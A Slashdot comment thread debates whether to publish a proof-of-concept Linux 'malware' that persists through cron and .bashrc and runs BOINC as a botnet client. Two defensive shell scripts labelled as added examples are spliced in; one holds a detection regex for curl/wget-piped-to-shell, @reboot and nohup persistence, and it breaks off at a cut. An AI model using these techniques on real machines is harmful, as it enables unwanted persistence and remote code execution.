There is no patch for human stupidity.
http://www.rocketdownload.com/software/rar.html
IANAL doesn't apply to you then? Wow, I thought it applied to everyone on slashdot.
Yes, amongst other things, IAAL (not the only one who reads here), but I can say IANAAL (last 'A' for American). And note that what I said is that it was the exact opposite of what I was taught at Law School. I would not presume to tell OP he is wrong in regard to his own jurisdiction. But in my jurisdiction there are instances where an implied permission to enter property and premises will be presumed. For example, we are allowed to knock on people's doors (unless a sign explicitly negates the legal presumption of implied permission to enter), and where I live, we also have a Fire Service who regularly enter premises without the explicit permission of the occupiers and pull them out to safety (though they probably have, in addition, a statutory right to do so).
But getting back on topic, this isn't an actual housebreaking. It's a housebreaking HOWTO.
Really?
Non-MALicious MALware?
It's awesome to see non-malicious malicious software for Linux.
Way to go, kdawson, your reading comprehension skills are just freaking top notch.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
McAfee is indeed malware, they after all provide an antivirus for MacOS X that seems to only defend from viruses that can't affect it since their list is 99.9% old MacOS for maybe a dozen pieces of actual mac malware for which they did too little too late while their application is probably one of the rare ones that not only breaks on OS version changes but also on simple OS updates all the fucking time.
That said, true, McAfee is obviously not the only source of malware on linux.
And I'm not worried at all. Peeling back some "nasty" multi vector injection into start-up and cron will probably take me less time to clean up than it took the author to write.
“Common sense is not so common.” — Voltaire
However, if anyone is tricked into running this you may well become a pariah like the writer of the relatively harmless and easily reversible "DS Bricker" when he released his proof of concept Nintendo DS malware. Pointing out the wolves is one thing; putting on their clothing and pretending to bite ankles is another and will get you shot like a wolf.
Also, what exactly are you trying to educate people about here - that users can be tricked into running something effectively like bittorrent for someone else, or ssh for someone else, or is it more than that? We all saw the big purple monkey the first time around, so I hope there is more to your argument than that. Many have learnt nothing from the growing malware plague, but one more bit of malware is unlikely to change that. Consider all the linux rootkits there have been in the past with nasty tricks like compiling their own kernel modules; what do you have that is worse than that and new?
Not true. I'm off to a D&D game tonight where one guy - oh wait, she ditched him.
Why should a (web)server be allowed to issue any request? It should be configured to answer queries only, no? iptables is great and easy to set up for that task. Even for software updates, one may push the package needed to the target server in place of the usual pull from the target, so no exceptions are needed on the firewall.
For desktops it's a little bit more complicated... but using a home partition mounted with noexec should suffice. Installing new software is not a casual issue but a real event and should be taken care of by someone knowing what he's doing. That's why root was invented, isn't it?
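As an added example (not code from the thread or any poster), a POSIX shell check for the noexec mitigation described above: it resolves which mount holds a given path by longest mountpoint prefix, the way the kernel does, and reports whether that mount carries noexec. The mount table is passed in as text, so the sample below is a constructed one; on a real host you would pass "$(cat /proc/mounts)" instead.

```shell
#!/bin/sh
# Added example, not from the thread: check whether a path lives on a
# filesystem mounted with noexec. The mount table is passed in as text so
# the check can run on a constructed sample (or on "$(cat /proc/mounts)").

# mount_opts_for PATH MOUNT_TABLE -> prints the option field of the mount
# that holds PATH. /proc/mounts fields: device mountpoint fstype options dump pass.
# Longest matching mountpoint wins, which is how the kernel resolves paths.
mount_opts_for() {
    printf '%s\n' "$2" | awk -v path="$1" '
        {
            mp = $2; opts = $4
            # a mountpoint matches if it is "/", equals the path, or is a
            # proper ancestor directory of the path
            if (mp == "/" || path == mp || index(path, mp "/") == 1) {
                if (length(mp) > length(best)) { best = mp; bestopts = opts }
            }
        }
        END { print bestopts }'
}

# has_noexec PATH MOUNT_TABLE -> exit status 0 if PATH is on a noexec mount.
has_noexec() {
    opts=$(mount_opts_for "$1" "$2")
    case ",$opts," in
        *,noexec,*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Constructed sample mount table in /proc/mounts format: /home and /tmp are
# noexec, but a build tree under /home has its own executable mount.
SAMPLE_MOUNTS='/dev/sda2 / ext4 rw,relatime 0 0
/dev/sda3 /home ext4 rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sdb1 /home/build ext4 rw,relatime 0 0'

# Audit a few paths against the sample table.
for p in /home/alice/fluffy_kittens.sh /home/build/out.sh /usr/local/bin/x /tmp/x; do
    if has_noexec "$p" "$SAMPLE_MOUNTS"; then
        echo "$p: on a noexec mount (direct execution is refused)"
    else
        echo "$p: on an executable mount"
    fi
done
```

noexec only refuses direct execution of a file on that mount; "sh ~/file.sh" or an interpreter invoked on the file still runs it, so treat it as a guard against accidental execution, not a sandbox.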
I'm not getting into your house if you make me die in a fire.
What? Have things now become so gentrified that this question even needs to be asked?
Release it already.
The 90's were great because there were active threats from all sides, spurring people to meet the challenge with actual defenses against the mayhem. By comparison now things are much more secure, but they are also incredibly less exciting, and markedly less progressive. If developers/coders are driven by a need to scratch an "itch" then by all means let's make things itchy again.
The software is non-malicious you say? Great! If nothing else it'll serve as some things for people to think about as they continue to develop their environments, and at the very least it sounds like you may have identified some genuinely soft spots in the current generation of Linux distributions. You would be far from the first person to post non-malicious proof-of-concept code to say, Bugtraq. This is not new ground--no one is going to claim you did something wrong by publishing.
Release it already!
Either we're tough enough to handle it, or we'll get tough enough to handle it.
Your idea has both merit and originality. Unfortunately the bits that have merit are unoriginal, and the bits that have originality have no merit. Good luck attempting to get n00b Ubuntu ('cause Debian is tooo hard) users to install your "malware" - given that so many of them think cli is some sort of "G" spot. Is your exploit driven by the availability heuristic?? Leaving aside the chances of your exploits "wising up" the world (get down off the cross, we need the wood), I am reminded of the saying that the "empty matchbox makes the most noise". Google gives "Results 1 - 10 of about 1,780 for "I was fed up with the general consensus that Linux is oh-so-secure and has no malware." del./r>null PS. If you find you can't unlock your C:, try "" as a password (without the quotes)
I don't hear linux zealots talk about security through obscurity.
It is the windows zealots who state that as a justification on why windows is so virus and malware prone.
In France it doesn't work that way. One of my mother's friends witnessed it first-hand: strong guys came and knocked down the door of the house my friend had just bought and was renovating, then left. A third person moved into the house, and there was no way at all to force him to leave because he had not broken the door himself, even though this person had obviously no proof that he owned or rented the house, and my friend had the property title. He did some research and found an extreme-left website which provided instructions on how to take advantage of the law in this manner, going as far as providing a platform for homeless people to get into contact with the guys who would knock down the door.
A year later the police arrested the man for something completely unrelated (he was a transvestite prostitute), and my friend got his (by then completely destroyed) house back. All he could do was pay for renovation again, there was no way he could sue the person and have him pay the bills.
Gotta love a country where you can get jailtime for possessing even small amounts of marijuana, but where you can just "steal" a house from someone and thrash it completely without any consequences...
If Linux malware is unheard of, why does McAfee sell LinuxShield?
The question isn't why they sell it, but why customers buy it, and that is most likely for "Benefit" 4:
LinuxShield protects Microsoft Windows systems by blocking Microsoft Windows viruses from passing through the Linux environment
... if their product can be used as a gateway for malware to enter the system running it. They should at least write a "How to install/run BOINC without being screwed", if not extend the connection protocol to force a "BOINC tasks distribution server" to authenticate in a special mode (while deprecating the previous protocol allowing a poser to trick the user into downloading "jobs" from them).
Questions raise, answers kill. Raise questions to stay alive.
I doubt it.
Tech savvy != intelligent
My linux systems get a lot of attacks every day. SSH, FTP and HTTP attacks are the most common.
On HTTP attacks, most try to get a page /phpmyadmin or some other (most of the time php-) application which seems to have severe security issues. There are many insecure web applications out there that are not patched or pretty much broken by design.
I bet the security hole you're exploiting is already used in the wild. If that's so, who cares if another kid takes your code and turns it into real malware?
I personally believe it's more beneficial to release your code as a "penetration test" and help some admins check their servers for potential security holes than to do nothing in fear of a few kids.
Release it privately to some of the "good guys" so they can fix it?
Can Linux be modified to prevent such malware from being run on any given machine? If so, why would you not want to help close such a glaring hole in the OS, while maintaining the least amount of disruption?
I see malware as something that needs fixing. You seriously do not?
To be honest, I don't really see why you are asking /.
You should be taking this straight to the folks that work on this stuff...uh...erm...Hrmm. /exit stage, left
If you created this code in hopes of making things better, first of all, talk to developers, if you have good ideas about how to eliminate such possible threats, or write articles and talk to regular people about good computer practice and computer security, thus educating them. Those who do understand computer security already know it is possible to hack any system and they do not need any kind of demonstration. It has always been possible to hack a system, whether it is windows, mac or linux... just wait for a bug and that's it, you will have your chance of hacking.
And to release it, just to show some regular people that it is possible to hack stuff in linux too, is useless, pointless and even harmful in the long term. Regular people do not understand, do not want to understand and will never understand computer security.
So if you want to make things worse, go, release the code and start to screw up the linux system.
Some things are genuinely ambiguous, and "should I release a sample virus which helps security researchers and malware authors at the same time" is, IMO, pretty ambiguous. The optimal solution would be to find a way just to release it to some security people and then put it out after a few weeks.
If someone wants your network, they will take it regardless of how much security is implemented. It's that simple.
So you can write malware for linux - no big deal - connecting to IRC and waiting for instructions like DDOS'ing some server and sending mails, sure that's possible. The reason why linux is so secure is not that malware was magically "impossible" (which would contradict Rice's Theorem btw)
if you have access to a machine, then OF COURSE you can install malicious binaries, only an idiot would claim the opposite! GETTING that access is the problem! and default-users don't have access to system directories, so they can only infect their own account (plus: since binaries by default don't get the execute-bit, it's quite hard to make someone execute your binary by accident e.g. by making it look like a word-document or a video or something... you have to get him to chmod +x your binary, and THAT is no accident anymore)
The MAFIAA is a bunch of mindless jerks who will be the first up against the wall when the revolution comes
On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed.
This is pretty silly. Slow news day?
^..^
Mail it to Linus, Alan Cox and the maintainers of subsystems which it abuses. Include clear notes of how it works, and what can be done to protect the systems. If you can't trust these people with it, then you should not trust Linux with your data at all. Even better, since you understand the tricks it uses, if you can write some patches, and submit them, together with your proof of exploit.
On a personal note - I also want to say thank you for doing this work. I use Linux both on servers, and as my normal desktop, and I'm immensely pleased that people are looking at making it safer: thank you.
Intelligence is task specific. You can have brilliant scientists be reduced to bumbling idiots the instant they sit down in front of a computer. Of course it's not a matter of brainpower but a matter of knowledge, but they don't have that crucial knowledge and thus make mistakes that, to the average computer geek, look like pure idiocy.
Asking random smart people about the ethical implications of a highly technical issue is not going to give as many insightful answers as asking random technical people does.
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
That seems like an oxymoron to me.
His worm had a little bug in it and see what happened to him :)
"a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects"
Can you provide a link to a demonstration of this Linux 'malware'. One that - with no user action - can compromise my machine or by clicking on even a version of 'malware' that works by clicking on a URL or opening an email attachment.
As far as I can make out, users must first download and install BOINC and allow RPC calls. I mean, if that's your definition of malware, so is me putting a safe in the middle of the street with the combination numbers taped to it. No doubt you would then write a story about just how easy it is to crack that particular model of safe.
kdawson, have you nothing else to write about ???
I'm not pro-war, but I sure as hell will be happy that war allowed us to develop the nuclear bomb when aliens invade. So I say release it - knowledge is impossible to contain - we are better off adapting to it early.
So the fact that Apple computers are consistently the first to be hacked in pwn2own contests, have completely passed you by?
What is it that makes malware, well, malware?
It's software on your system which you don't want there, didn't ask for, and can't easily get rid of without a significant investment in time and/or knowledge.
Seems like it fits the definition to me. In Windows, malware usually infests the system (registry, files, processes, etc.), and sometimes it's not all that clandestine about it. This would not be so dissimilar from unwanted software which only remains resident in the user's $HOME: due to uniform package management and vastly improved install scripts/configuration, a reinstall is relatively straightforward (dump package names, reinstall, install packages) and takes a reasonably short period of time (less than a Windows install on its own, for instance). Instead, the offending executable would have to be dug out of $HOME manually (or found with a tool) - either way, it's an agitation and non-trivial if you're unsure of what you're looking for.
Now, is this malware example particularly trivial and not all that attention grabbing? Yes. How did this make FP?
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
It doesn't matter what you do now, some asshat is going to read the description of the "linux malware", reproduce it without bragging about what a l33t script kiddie he is, and you're going to take the burn for it. As for it being a linux malware
I can understand that
I'm not sure that having the user specifically install a software package that specifically runs downloaded programs is the same class of malware as windose users are typically plagued by anyway. This is more social engineering than a linux security hole, and more of a boinc security problem than a linux problem.
So basically what you're saying is Linux is oh-so-secure that you have to trick users into installing your malware.
You may be able to install into .bashrc, but it's not going to work in cron without privilege escalation or a security hole; usually only windosers mindlessly type in privileged account passwords to install software to run in limited accounts. In fact I'm calling BS on this: you don't have this malware, you just have a plausible idea for it that you've not bothered to implement.
Apocalypse Cancelled, Sorry, No Ticket Refunds
As long as you release it properly you should do it.
Don't kid yourself. It's the size of the regexp AND how you use it that counts.
"If executed by the user"
We're done here. Next time try a remote exploit requiring no user action. They do exist.
There isn't something all white you could be doing instead? Priorities man! Priorities.
-- Programming with boost is like building a house with lego. It's a cool but I wouldn't want to live in it
So one of my users accidentally runs your trojan. No problem. I write a script that cleans it up on every machine in my network without interfering with the users at all. It takes me about 5 minutes.
On MS-Windows, I have to go around to every machine on the network to clean it up. There have been times I've had to re-ghost a machine because it was so infected.
I'm not sure what this whole apple-to-oranges gedanken is all about. It surely doesn't explain how MS-Windows is just as secure as Linux.
Microsoft is to software what Budweiser is to beer.
The pwn2own contest isn't a bunch of people hacking different OS's simultaneously: They draw names from a hat to see who goes first. People aren't hacking from scratch at the contest either: most show up with exploits for multiple OS's that they already know to be working.
Since you get to keep the hardware if you're the first to hack it, OF COURSE EVERYONE CHOOSES TO USE THEIR MAC EXPLOIT FIRST. Vulnerability never even enters into the equation; it's hacked first because people want to win the most expensive and best hardware. Windows immediately falls when the next contestant steps up and can no longer win the Mac hardware.
Of course... Linux did make it all the way through the pwn2own contest in the past.... but it's impossible to say if that's due to lack of interest or the fact that the browser installed on the machine was one the contestants were unfamiliar with and therefore did not have working exploits.
Oh yeah... from reading about it, it seems that pwn2own tests browser security, not the OS - and it doesn't take into account whether the hack lets you execute user level code (the Mac exploits) or run as the kernel (many Windows flaws). So, I don't really see it as being of any real use as an OS security benchmark.
How can there be such a thing as non-malicious malware when malware is a portmanteau of "malicious software"?
No one cares what your captcha was
Houston TX, USA
Yes, release it! Security through obscurity isn't. This is needed.
Over-the-top Response Guy! Giving "Over-the-Top Responses" since 1970.
That's like one guy who said "My best friend's girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?"
Yes, she's already sleeping with more than one of your best friends, so go for it!
OMG a buffer overflow vulnerability in package arfafdre-0.54! How utterly tragic.
Now tell me how that really matters to me.
You can't.
All you can do is to make bogus noises about how some buffer overflow bug is equivalent to some Windows malware BRINGING DOWN THE INTERNET.
Your weak insults do not change this fact. ...and if you want to be accurate: Call me a "Unix cheerleader".
A Pirate and a Puritan look the same on a balance sheet.
a lot of us have been in the position of being able to do a lot worse, or been offered $$$ to do a lot worse
As a Linux user who works as a software engineer, I'd be interested to learn about the vulnerabilities that the exploit uses to take control of a Linux system. I have no formal security background, but understand how to use cron and Makefiles for non-nefarious purposes... so a short paper about these attack vectors would be quite educational. I like knowing how to protect myself and knowing how to explain to other people what is right/wrong so they can protect themselves. Not publishing known risks (especially if they're PEBCAK risks) is security through obscurity and I think Linux is a strong enough platform that it shouldn't be relying on this type of security.
Ha, Firefox and Explorer stopped responding the first time I opened this thread, so I'm getting a kick, etc.
Anyway, thanks for reminding me that I need to invest in a bunch of RAM for my home server so I can move most of the services into VMs :P
I'd go so far as to say that I highly doubt that sufficient numbers of people would be adversely affected by it to warrant any sort of legal action against you... at most you might be providing a proof of concept for security experts who can then proceed to adapt to what changes may be necessary to avoid the attack vector in the future.
Release it, and move on.
File under 'M' for 'Manic ranting'
"Who's" is a contraction of "who is". It should read "There's one thing stronger than all the armies in the world and that is an idea whose time has come. - Victor Hugo"
Free Martian Whores!
huh, crontab is runnable by normal desktop users in most desktop distros out of the box anyway
It has the bi- prefix.
Just as a lot of other interesting stuff, all starting with "bi-".
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
Let's put it another way. Even if I left my house door wide open, opened all the windows, etc., it still does not give you the right to come in and f*ck with my house.
I'm more inclined to f*ck with your wife, actually.
Support my political activism on Patreon.
I hope you either do not have a door mat, or the door mat does not say "welcome". If the door mat does say welcome, that is an invitation to come in.
My door mat says "go away" just for that reason.
If I remember right there was a case (I forget if it was home or computer based the case was 20+ years ago) where the criminal said hey it said welcome so I went in.
if Linux starts getting as bad as Windows, I will personally hunt you down and beat you to death with Richard Stallman
"I disapprove of what you say, but I will defend to the death your right to say it." - Evelyn Beatrice Hall, re Voltaire
Those involved would have been severely injured if this was me. I'm highly, highly territorial; a person forcibly living in my home would make me extremely paranoid and uncomfortable, I wouldn't be able to sleep or leave the house until I had permanently ejected him. It'd take about 5 minutes for me to assess the situation enough to realize that he's not leaving except by force, at which point my brain would shortcut to causing as much physical harm as possible in quickly increasing magnitude until he left or surrendered.
It's like moving into a wolf's den, with an angry bitchwolf with pups. Except I'm a bachelor, I'm just paranoid (I hate kids too and would never have my own, ever; I'm not sure I could even allow a girlfriend or spouse to reside in the same home as me).
Then you'd get sued by the intruder...
And to clarify, my friend didn't live in the house yet because of the renovation, which explains how they could take over the house so easily. And he couldn't have lived with the intruder even if he wanted to, because in the eye of the law the intruder was the inhabitant of the house, not my friend, so he'd have had to ask the intruder for permission to live in his own house!
Um, and this is different from a Windows virus how? {...} It's not because your system is any more secure against "CLICK HERE TO WIN FREE XBOX 360" infections.
Windows XP way:
Linux way:
In short, there are 2 main differences between the Windows and Unix environments:
There's another big difference, specific to open-source environments like Linux and BSD (and not other Unices):
(Although the above only regards malware exploiting *bugs*, not payloads which are simply regular software.)
With Vista and Seven, Microsoft has attempted to fix some of these problems. Nonetheless, the fix is still quite noisy ("Cancel or Allow?") to the point that some users simply start to blindly "Yes-click-through" and the protective effect is lost. And users are still trained to install crap by downloading it from random websites.
With Linux, these advantages become a handicap regarding commercial software: they have to target multiple combinations of software in distributions (unlike open-source software, where the packages are vetted by the distribution maintainers themselves thanks to the source being available for that purpose). And this software is not just a package in a regular repository, making it inaccessible using the regular method.
There is indeed no software which is 100% guaranteed secure.
But! There's still a difference, like between putting a real fence around your house and having a dog on one side, and just sticking a paper with "don't rob us" written on it on the other side.
And, no matter what, some users will always find a way to shoot themselves in the foot.
But on Unix, the gun is locked behind a glass door and must have a security pin removed before being able to shoot the foot, whereas on Windows an armed, ready-to-shoot gun is just a normal wall decoration.
The only "protection" that *nix/mac systems have over Windows is that no one gives a rats ass about infecting you
Ok, could we please stop with this troll now ?
At one side of the range, Linux has rather good market share in the server and scientific cluster domains.
At the other side of the range, Linux has achieved a quasi-monopoly in the embedded domain, especially on home routers, wireless access points, small NAS/SAN, no-brand multimedia play
So you want to do away with Ask Slashdot? It's a moral dilemma, he's got the potential to do great good but it just as easily might enable those who would use it for evil. Asking peers for opinions or insight doesn't mean he wants to blame others. There might be things he hasn't thought of, or a better way to accomplish things. It's just a smart thing to do.
"Dr. is this the correct incision point, or will cutting here kill the patient?"
"If you have to ask, your ethical compass is b0rked. Dumb@ss n00b!"
Can we mod parent up?
The real reason Linux is malware-free can be summed up in a simple analogy: "You don't let your dog shit in your own front yard." It's no question the preferred box for hackers is a *nix box. Why sully their own yard when there are so many Windows and Mac homes out there with yards perfectly ripe for a fresh Cleveland Steamer?
Like parent says, it's stupid to think of Linux as uncrackable. If there's a port into the system then there's a potential exploit; it doesn't matter what the box is running. It's far more likely that malware hackers just like to have a clean lawn. Leave that shit for some other guy to clean up.
cron would be pretty useless in a multi-user system if multiple users couldn't use it. I actually wrote a shell script that "infected" my FreeBSD box using .*rc files and crontab once. There really is no need to release the software though as the concept is not rocket science. Just write up a description of how it's done. Anyone with UNIX knowledge could replicate it based on the description alone.
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
Yes, it's pretty common to run an antivirus program on a Linux-based mail server, specifically to catch Windows viruses in messages it relays. (The Linux version of ClamAV, for instance, seems to be pretty rudimentary in every area but catching email viruses, presumably because there's nothing else it could plausibly do.)
(1)DOCOMEFROM!2~.2'~#1WHILE:1<-"'?.1$.2'~'"':1/.1$.2'~#0"$#65535'"$"'"'&.1$.2'~'#0$#65535'"$#0'~#32767$#1"
Please don't associate BOINC with your little project. It will confuse the casual reader into thinking it is something bad rather than something good.
"Education is not the filling of a pail, but the lighting of a fire." -- William Butler Yeats
Freddy Krueger oven then. If the intruder is such a threat to my continued livelihood, he's hostile and must be executed.
Why should this be any different from what research scientists do all the time (with actual security holes to boot)? Just write up a research paper (or a blog post or whatever) and describe the problem and give some thoughts to possible solutions (user not being mindless idiots anymore) and release it. There is definitely nothing ethically wrong with it in my book (and there shouldn't be in anyone else's either).
I'm not sure that having the user specifically install a software package that specifically runs downloaded programs is the same class of malware as windose users are typically plagued by anyway.
The vast majority of Windows malware is installed via social engineering. Exploits are certainly used, but dancing bunnies and fake virus warnings seem to be an easier method for the bot herders out there.
Please stick to Jaunty for now. DO NOT try to install Karmic yourself.
"When information is power, privacy is freedom" - Jah-Wren Ryel
I'm sorry, but running userland "daemons" is child's play. This has been around for EONs. Please don't think you have something new here.
Your problem here is that your idea will only affect the *USER* environment, not the machine. Anything you run or install into the user environment will be bound by the standard user accounts everyone should be running as, without privileges (such as root/super user).
This separates the privileges of the user and the system quite well and delineates them.
Let's compare Windows and *NIX (in general):
Windows: I can send you an e-mail and your standard user just looks at my e-mail and via ActiveX can leverage a 10 year old exploit to install a service as a *SYSTEM ACCOUNT*. This means my process then has full access to the system... Possibly being able to wipe out the machine period, or use it for a launching pad to send out e-mails to other accounts on the system or other accounts in any address book, or just grab your passwords (probably being abcd1234 or password or what have you (Think Sarah Palin's Yahoo account... wooo really good password there)) for your Bank account. It's very much *THAT* simple, no stupidity involved.
Now, if for some reason ActiveX is disabled, I can just tell you how important the Microsoft update is and it needs to be run... and how you *MUST* forward it to your friends so they can be safe... Sheeple are gullible and will never be safe from this stupidity.
Now speaking of stupidity, it's really the only way Linux/*NIX/*BSDs will be compromised... even then most likely only the *user's* data will be flogged. Not the whole system. Now, let us just say *I* download and run your program/update/shell/python script/perl script/etc... Sure it downloads and installs the BOINC daemon and runs in the background... to be honest who cares. Any program you run or have running to capture data from the user will only affect the *USER* not the whole system. Separation of privileges is pure and simple why the *NIX systems will not seriously fall prey to these kinds of things. And to be honest, unless you install a persistent AT job for the BOINC daemon to start or at the very least a cronjob that runs every minute... a reboot will kill your pitiful attempt.
greg, REMEMBER ED CURRY!!!
A father used to rationalize why he was so mean to his son by saying, "I'm getting him ready for the world, because it is mean." By that rationale, the best thing would be to simply dump the child out on the streets.
If you see flawed code, submit a patch.
If you see flawed usage, educate users (documentation, blog article, forum posts).
My son's system got hacked that way [backwards "..."] "Here download this program, run it, ignore any warnings, choose 'allow' for every UAC prompt, and then it will give me remote control of your system so I can 'fix' it for you." [...] I was busy in the other room [...] Teenagers, seesh, looking for the quick fix, but adults are just as dumb and fall for the same thing as there are so many helpful strangers on the Internet
The problem, as I see it (and it's only a guess, but hear me out), is one of conditioning.
Windows (I've used 95, 98, XP) tends to warn about pretty harmless stuff. "Are you sure? Only click yes if you want me to do what you just asked me to." Or "Warning: [weird undecipherable sentence about cryptography that will take those who know about crypto a good 15 minutes of research to answer the right way with a modest success rate]. Yes or no?" And clicking "Yes" always works. "Warning: running this program might have side effects (as opposed to just spending its cycles making your CPU hotter). Run it?"
A lot of repeated trials of this ought to condition users to take warnings with a grain (well, bucket) of salt. Add on top of this all the experiences where they copy-paste the error message into google, find a forum post which fixes their problem, or ask someone on IRC and they provide the solution, and people will learn to trust strangers on the internet (because said trust is most often warranted).
Ask yourself how you solve technical problems with your boxes. Do you research everything yourself? Or do you use google/IRC/...?
I don't know exactly how the situation looked through the eyes of said teenagers. Did it really explicitly say "let me take control of your computer"? By your own statement, you were away when it happened. Did you go back and look afterwards?
Most of the things you find on the net are the good stuff. Windows conditions users into not taking warnings as a serious sign of (potential) danger. Is doing what your environment tells you is the right thing called "looking for the quick fix" these days?
then show this code to whomever it will help actually fix those holes but try not to release it to the public at large
I'm sorry to bring up an argument that everyone has already heard (or worked out on their own), but I think it warrants saying (yet again):
How about also releasing information about workarounds to the countless systems administrators who are in a position to deploy that workaround? (Good luck on doing that while not releasing information to the general public)
I'd bet half of the people who mock windows users for downloading and installing untrusted software would download this, type in their root password, and let it install.
Why wouldn't they compile it with --prefix=~/local/ instead? That way, you know where you install all your shi^Wsoftware...
hear, hear, but let's be frank: except for the BOINC and the proxy stuff, he's doing stuff most of us have already thought about once upon a time
and your going to take the burn for it
oops! I think you chose the wrong homophone. The word you are looking for is "yore".
I would certainly say so. I would say that the moral behavior "emerges" from the crowd, the same way your consciousness "emerges" from the neurons in your brain, even though no individual neuron is conscious. Democracy is premised on a similar idea.
I find this extremely hard to believe, especially because of its anecdotal nature. The French have no notion of private property? If I run through the door as you exit, you can't have me removed because I didn't break the door? If you hire/ask random criminals to do your dirty work, or benefit from others' criminal behaviour, you are not responsible? How did this third person prove it wasn't him who broke the door?
And the French have no protection from vandalism? It's ok to break stuff, for instance furniture or doors, because you can't be prosecuted or sued?
This doesn't ring true. I googled for a while and, as expected, found absolutely nothing to support your story. Do you have links to laws, or even news stories?
Are you a grammar Nazi? I'm trying to improve my English; please correct my errors!
No news story, as there never even was a trial, and I haven't got the time to find links. I guess you'll have to take my word for it, and since it didn't happen to me directly I can't even guarantee that the story is true, but my mother's friend talked about it at length and seemed really distressed.
Ofc we have a notion of private property, but it can be really hard to evict tenants, IIRC the guy had signed up for electricity in his own name, and the bills "proved" that he lived there. We also have protection from vandalism, but when the vandal is a former homeless person who is now in jail for prostitution, you don't expect him to have any money nor insurance...
Frankly I don't believe it, but it's not a big deal :) You just got me curious. Thanks for your answer, there's no reason to discuss this further.
Are you a grammar Nazi? I'm trying to improve my English; please correct my errors!
Doesn't that just make it 'ware'?
In too many cases, the questions are along the lines of "I don't feel like doing my homework" or stuff like that. Or questions that could have been answered with the first search result from the text of the question itself. Or they're really slashvertisements. That's why many of these go off-topic; once 20 people have posted "justfuckinggoogleforit", there's not much more on-topic.
In this case, the poster was either looking for absolution or wanted to brag a bit.
Now, as to doing away with "Ask Slashdot" - why not Ask Slashdot?
Personally, I have no problem with it, but then again, I have no problem with idle.slashdot.org either, so you can be excused for thinking I might be slightly brain-damaged.
The obvious solution would be to continue the renovations, and make it as unpleasant as possible for someone to try to live there.
For instance, by not having any utilities installed while the perpetual renovation prevents it.
By fencing off the place, having the driveway blocked, etc.
Release it. It's not malware in the way that windows malware gets spread. My Linux and FreeBSD boxes ARE more secure than your windows boxes. If it can't be installed without user interaction, it's useless here on /.
Me thinks it's a hoax and flamebait.
I say things which affects my Karma negatively. (and I don't care) For instance; All religion is false.
I just checked my Arch Linux and the directories cron.d, cron.hourly, cron.daily, cron.weekly and cron.monthly are all root:root and the permissions are 755 so I can execute anything there with my UID but I can't change or install anything without being root. I know some servers will have cron execute a specific script in the user's home but this is usually done on shared hosting servers.
Either you don't fully understand what cron is and how it works, or you do and are just putting too much importance into root permissions.
cron allows any user to schedule jobs on a UNIX system. This is not a feature exclusive to shared hosting servers. Every UNIX system supports this out of the box.
Regarding root permissions, malware doesn't need root permissions to connect to a botnet, so root doesn't really matter in regards to whether or not malware can latch onto and use a unix system's resources.
So go ahead, release the code, I'm not worried. He might even infect 100 machines! Woop de do. If I put the same effort into a windows virus, I could probably own millions in just a matter of days. I don't need a proof of concept, there are plenty of real world examples. Most machines STILL run as admin in the windows world.
Well your mod just went away when you replied to that comment. Thanks. ;)
SIG FAULT: Post index out of bounds.
If you're so afraid, release it, but don't open-source it. Though since you have made this already anyway, people are going to make their own malware eventually.
I am not devoid of humor.
Just send it to me. I'll keep it safe.
A lot of popular closed-source apps like Skype and Flash are available as .deb packages, and if someone is used to downloading .exe and .msi files from random places it's no big leap to do the same with a .deb.
And this is really bad, because it breaks the whole "use one single - or a reduced number - of trusted sources" security principle behind Linux distributions.
Thankfully, some of this software comes with a license which allows it to be repackaged by distributors (often the case with Flash).
Sometimes the distributor tries to mitigate the problem by providing a 'fetcher' package, which doesn't repack the proprietary software but attempts to retrieve a known-good version from a known-good source (Microsoft's Core Fonts are often programmatically downloaded that way). But nonetheless this makes the user rely more on external sources.
Nonetheless, proprietary closed-source applications like Skype pose security threats by themselves, lacking the amount of eyeballs as stated in ESR's "Linus's law".
How are Windows Vista and Windows 7 better than XP in screening out the malware? How is Macintosh better? I will buy a new computer soon. I really need to know!
Have you tried setting up a crontab file as a normal user? Hint: it should work, though it won't live in /etc.
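As an added example (not the poster's code and not anything from this thread), here is a read-only audit of the per-user persistence spots the cron comments above describe: the user's own crontab, which lives in the cron spool rather than under /etc, plus the shell rc files. The suspect patterns and the sample crontab/.bashrc content are my own construction; it flags lines for review and removes nothing.

```shell
#!/bin/sh
# Added example: audit a user's crontab and shell rc files for lines that
# look like unattended persistence. Read-only; nothing is modified.
# SUSPECT_RE and the sample data are constructed for this example.

# Extended regex, one alternative per idea:
#   - an @reboot cron entry
#   - a download (curl/wget) piped straight into a shell
#   - a nohup'ed background process
#   - an executable living in a hidden directory under a home directory
SUSPECT_RE='^[[:space:]]*@reboot|(curl|wget)[^|]*\|[[:space:]]*(sh|bash)([[:space:]]|$)|(^|[[:space:];&|])nohup[[:space:]]|(~|\$HOME|/home/[^/[:space:]]+)/\.[^/[:space:]]+/[^[:space:]]+'

# audit_file FILE LABEL: print each non-comment line of FILE that matches
# SUSPECT_RE as "LABEL:lineno:text". Prints nothing if FILE is unreadable.
audit_file() {
    file=$1; label=$2
    [ -r "$file" ] || return 0
    grep -nE "$SUSPECT_RE" "$file" | grep -vE '^[0-9]+:[[:space:]]*#' |
        sed "s|^|$label:|"
}

# count_suspect FILE: number of flagged lines (0 if unreadable).
count_suspect() {
    audit_file "$1" x | wc -l | tr -d ' '
}

# audit_user: the calling user's crontab (from the spool, via crontab -l)
# and the usual shell start-up files.
audit_user() {
    if tmp=$(mktemp 2>/dev/null); then
        crontab -l > "$tmp" 2>/dev/null
        audit_file "$tmp" "crontab"
        rm -f "$tmp"
    fi
    for rc in "$HOME/.bashrc" "$HOME/.profile" "$HOME/.bash_profile" \
              "$HOME/.zshrc" "$HOME/.xsessionrc"; do
        audit_file "$rc" "$rc"
    done
}

# Constructed sample data standing in for a user's real files.
write_sample_crontab() {
    cat > "$1" <<'EOF'
# m h dom mon dow command
0 2 * * * $HOME/bin/backup.sh
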